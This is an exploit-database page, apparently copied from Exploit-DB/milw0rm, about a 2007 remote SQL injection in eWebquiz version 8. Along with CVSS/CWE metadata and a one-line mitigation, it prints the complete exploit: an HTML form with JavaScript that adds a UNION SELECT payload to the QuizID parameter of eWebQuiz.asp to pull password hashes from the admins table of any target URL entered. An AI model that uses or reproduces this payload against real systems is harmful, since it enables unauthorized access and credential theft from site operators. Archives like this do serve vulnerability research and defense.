header-logo
Suggest Exploit
vendor:
eWebquiz
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: eWebquiz
Affected Version From: Version 8
Affected Version To: Version 8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit

This is a remote SQL injection exploit for the eWebquiz version 8. It allows an attacker to inject SQL commands into the QuizID parameter, which can be used to retrieve sensitive information such as password hashes from the admins table.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit</title>

<script language="JavaScript">
 
//'===============================================================================================
//'[Script Name: eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[S.Page     : http://www.activewebsoftwares.com
//'[$$         : $ 599.00
//'[Using      : Write Target after Submit Click
//'===============================================================================================

//# ajann,Turkey
//# ...

   

     //Basic exploit,but any time : ( 
   var path="/"
   var adres="/eWebQuiz.asp?" //File name
   var acik ="QuizID=" // Line x
   var sql = "-1%20union%20select%201,2,3,4,5,6,7,1,2,3,4,5,6,7,8,9,1,2,3,4,5,1,2,3,111,password,0,1%20from%20admins"
  
   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }


  
  rfi.action= document.rfi.target1.value+path+adres+acik+sql; // Ready Target : )
  rfi.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Verdana" size="2" color="#008000">eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>
  <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
  <p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</center>
</body>

</html>

# milw0rm.com [2007-03-23]

Navigation

Suggest Exploit

Services By CQR